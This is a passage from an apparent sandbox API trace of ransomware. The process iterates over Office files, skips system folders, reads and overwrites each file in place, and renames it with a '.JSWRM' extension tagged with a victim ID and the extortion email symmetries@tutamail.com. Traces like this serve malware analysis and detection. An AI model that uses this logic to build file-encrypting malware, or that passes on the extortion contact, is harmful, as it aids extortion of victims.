Flags=0x0, Size=0x90) returned 0x20ff90 [0114.516] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.517] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=204) returned 1 [0114.517] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0114.517] ReadFile (in: hFile=0x238, lpBuffer=0x24bce0, nNumberOfBytesToRead=0xc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24bce0*, lpNumberOfBytesRead=0x345e89c*=0xc0, lpOverlapped=0x0) returned 1 [0114.518] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.518] WriteFile (in: hFile=0x238, lpBuffer=0x24bce0*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24bce0*, lpNumberOfBytesWritten=0x345e898*=0xc0, lpOverlapped=0x0) returned 1 [0114.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0114.518] CloseHandle (hObject=0x238) returned 1 [0114.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0114.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0114.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0114.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0114.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0114.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0114.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0114.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0114.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.519] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_col.hxt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_COL.HXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_col.hxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0114.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0114.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0114.520] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9a9e866, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9a9e866, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9ac4a8a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x72, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="LYNC_F_COL.HXK", cAlternateFileName="LYNC_F~1.HXK")) returned 1 [0114.520] lstrcmpiW (lpString1="LYNC_F_COL.HXK", lpString2=".") returned 1 [0114.520] lstrcmpiW (lpString1="LYNC_F_COL.HXK", lpString2="..") returned 1 [0114.520] lstrcmpiW (lpString1="LYNC_F_COL.HXK", lpString2="...") returned 1 [0114.520] lstrcmpiW (lpString1="LYNC_F_COL.HXK", lpString2="windows") returned -1 [0114.520] lstrcmpiW (lpString1="LYNC_F_COL.HXK", lpString2="recovery") returned -1 [0114.520] lstrcmpiW (lpString1="LYNC_F_COL.HXK", lpString2="perflogs") returned -1 [0114.520] lstrcmpiW (lpString1="LYNC_F_COL.HXK", lpString2="documents and settings") returned 1 [0114.520] lstrcmpiW (lpString1="LYNC_F_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0114.520] lstrcmpiW (lpString1="LYNC_F_COL.HXK", lpString2="system volume information") returned -1 [0114.520] lstrcmpiW (lpString1="LYNC_F_COL.HXK", lpString2="msocache") returned -1 [0114.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0114.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_F_COL.HXK", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0114.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_F_COL.HXK", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_F_COL.HXK", lpUsedDefaultChar=0x0) returned 14 [0114.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0114.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0114.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_F_COL.HXK", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0114.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_F_COL.HXK", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_F_COL.HXK", lpUsedDefaultChar=0x0) returned 14 [0114.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0114.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0114.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0114.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0114.521] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.521] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114) returned 1 [0114.521] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0114.521] ReadFile (in: hFile=0x238, lpBuffer=0x209878, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209878*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0114.522] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.522] WriteFile (in: hFile=0x238, lpBuffer=0x209878*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209878*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0114.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0114.522] CloseHandle (hObject=0x238) returned 1 [0114.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0114.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0114.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0114.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0114.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0114.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0114.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.523] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_f_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_F_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_f_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0114.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0114.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0114.524] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9a9e866, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9a9e866, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9ac4a8a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="LYNC_K_COL.HXK", cAlternateFileName="LYNC_K~1.HXK")) returned 1 [0114.524] lstrcmpiW (lpString1="LYNC_K_COL.HXK", lpString2=".") returned 1 [0114.524] lstrcmpiW (lpString1="LYNC_K_COL.HXK", lpString2="..") returned 1 [0114.524] lstrcmpiW (lpString1="LYNC_K_COL.HXK", lpString2="...") returned 1 [0114.524] lstrcmpiW (lpString1="LYNC_K_COL.HXK", lpString2="windows") returned -1 [0114.524] lstrcmpiW (lpString1="LYNC_K_COL.HXK", lpString2="recovery") returned -1 [0114.524] lstrcmpiW (lpString1="LYNC_K_COL.HXK", lpString2="perflogs") returned -1 [0114.524] lstrcmpiW (lpString1="LYNC_K_COL.HXK", lpString2="documents and settings") returned 1 [0114.524] lstrcmpiW (lpString1="LYNC_K_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0114.524] lstrcmpiW (lpString1="LYNC_K_COL.HXK", lpString2="system volume information") returned -1 [0114.524] lstrcmpiW (lpString1="LYNC_K_COL.HXK", lpString2="msocache") returned -1 [0114.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0114.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_K_COL.HXK", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0114.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_K_COL.HXK", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_K_COL.HXK", lpUsedDefaultChar=0x0) returned 14 [0114.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0114.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0114.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_K_COL.HXK", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0114.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_K_COL.HXK", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_K_COL.HXK", lpUsedDefaultChar=0x0) returned 14 [0114.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0114.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0114.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0114.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0114.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.525] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=113) returned 1 [0114.525] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0114.526] ReadFile (in: hFile=0x238, lpBuffer=0x209440, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209440*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0114.526] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.526] WriteFile (in: hFile=0x238, lpBuffer=0x209440*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209440*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0114.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0114.526] CloseHandle (hObject=0x238) returned 1 [0114.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0114.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0114.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0114.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0114.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0114.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0114.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.527] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_k_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_K_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_k_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0114.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0114.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0114.531] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4c15e5f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4c15e5f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xafa146a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x22756, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="LYNC_ONLINE.HXS", cAlternateFileName="LYNC_O~1.HXS")) returned 1 [0114.531] lstrcmpiW (lpString1="LYNC_ONLINE.HXS", lpString2=".") returned 1 [0114.531] lstrcmpiW (lpString1="LYNC_ONLINE.HXS", lpString2="..") returned 1 [0114.531] lstrcmpiW (lpString1="LYNC_ONLINE.HXS", lpString2="...") returned 1 [0114.531] lstrcmpiW (lpString1="LYNC_ONLINE.HXS", lpString2="windows") returned -1 [0114.531] lstrcmpiW (lpString1="LYNC_ONLINE.HXS", lpString2="recovery") returned -1 [0114.531] lstrcmpiW (lpString1="LYNC_ONLINE.HXS", lpString2="perflogs") returned -1 [0114.531] lstrcmpiW (lpString1="LYNC_ONLINE.HXS", lpString2="documents and settings") returned 1 [0114.531] lstrcmpiW (lpString1="LYNC_ONLINE.HXS", lpString2="$RECYCLE.BIN") returned 1 [0114.531] lstrcmpiW (lpString1="LYNC_ONLINE.HXS", lpString2="system volume information") returned -1 [0114.531] lstrcmpiW (lpString1="LYNC_ONLINE.HXS", lpString2="msocache") returned -1 [0114.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0114.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ONLINE.HXS", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0114.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ONLINE.HXS", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ONLINE.HXS", lpUsedDefaultChar=0x0) returned 15 [0114.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0114.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0114.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ONLINE.HXS", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0114.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ONLINE.HXS", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ONLINE.HXS", lpUsedDefaultChar=0x0) returned 15 [0114.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0114.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0114.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0114.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0114.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_ONLINE.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_online.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.533] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=141142) returned 1 [0114.533] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x22750) returned 0x24c1d0 [0114.533] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x22750, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x22750, lpOverlapped=0x0) returned 1 [0114.545] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.545] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x22750, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x22750, lpOverlapped=0x0) returned 1 [0114.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0114.546] CloseHandle 